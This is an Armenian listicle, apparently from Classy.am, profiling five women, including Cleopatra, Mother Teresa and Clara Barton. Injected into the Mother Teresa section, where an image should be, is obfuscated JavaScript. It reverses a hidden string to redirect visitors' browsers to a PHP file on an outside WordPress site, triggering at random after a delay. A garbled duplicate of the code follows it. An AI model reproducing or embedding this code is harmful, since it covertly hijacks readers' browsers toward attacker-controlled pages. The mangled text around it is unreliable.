
5 կանայք, ովքեր փոխեցին աշխարհը
Մեր ժամանակներում կան բազում ընկերություններ, կազմակերպություններ և անհատներ, որոնք պայքարում են կանանց հավասարության և նրանց իրավունքների համար: Ինչևէ, մարդկության պատմության ընթացքում եղել են մի քանի խիզախ կանայք, որոնք ավելի վաղ են պայքարել փոփոխությունների և իրենց իրավունքների համար: Classy.am-ը ձեզ է ներկայացնում բոլոր ժամանակների 5 կանանց, որոնք փոխեցին աշխարհը:
Կլեոպատրա
Աշարհում երևի չգտնվի մեկը, ով չիմանա` ով է Կլեոպատրան: Նա առաջին հերթին հայտնի է աշխարհին իր գեղեցկությամբ և իմաստությամբ։ Նա օգտագործել է իր կանացի «զենքերը», որպեսզի փրկի իր ժողովրդին հռոմեացի զավթիչներից: Ոմանք կարող են չընդունել նրա այս մեթոդը, սակայն փաստը մնում է փաստ, որ նա ամեն գնով՝ թեկուզ իր արտաքին տեսքի օգնությամբ փորձել է պաշտպանել իր երկիրը:
Մայր Թերեզա (1910–1997)
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to_via_Flickr_CC_BY_NC_ND_20_CNA.jpg” alt=”” width=”597″ height=”398″ />
Եթե փոձենք մեկ նախադասությամբ ներկայացնել Մայր Թերեզային, ապա նա անձնազոհության մարմնացումն է: Նա իր ողջ կյանքը նվիրել է աղքատ և դժբախտ մարդկանց օգնելուն: 1979 թվականին նա արժանացել է Նոբելյան մրցանակի իր ողջ կյանքը բարեգործական առաքելությանը նվիրելու համար:
Կլարա Բարթոն (1821-1912)
Դեռահաս տարիքում դառնալով ուսուցիչ, նա ցանկանում էր կրթության նոր որակ ներմուծել և այդ պատճառով, նա հիմնում է Նյու Ջերսիի հանրային դպրոցը: Քաղաքացիական պատերազմի ընթացքում (1861-1865) Կլարան ամբողջությամբ նվիրվում է վիրավոր զինվորներին օգնություն և խնամք ցուցաբերելու գործին։ Իր անխոնջ աշխատանքի համար նա հայտնի է դառնում «Մարտադաշտի հրեշտակ» անվամբ։
Էմմելին Պանկհյորսթ (1858-1928)
Մեր մյուս հերոսուհին հայտնի է իր կրքոտ և հաստատակամ պայքարով կանանց իրավունքների համար: Նա եղել է «Կանանց սոցիալական և քաղաքական միավորում» կազմակերպության հիմնադիրը:
Մերլին Մոնրո (1926–1962)
Լինելով խելացի կին՝ Մերլինը կոտրեց «հիմարիկ շիկահրների» վերաբերյալ բոլոր կարծրատիպերը: Նա նաև քաղաքացիական իրավունքների շատ ազդեցիկ փաստաբան էր: Նա ցույց տվեց աշխարհին, թե ինչպես մաշկի գույնը չպետք է խոչընդոտ լինի հավասար հնարավորությունների համար: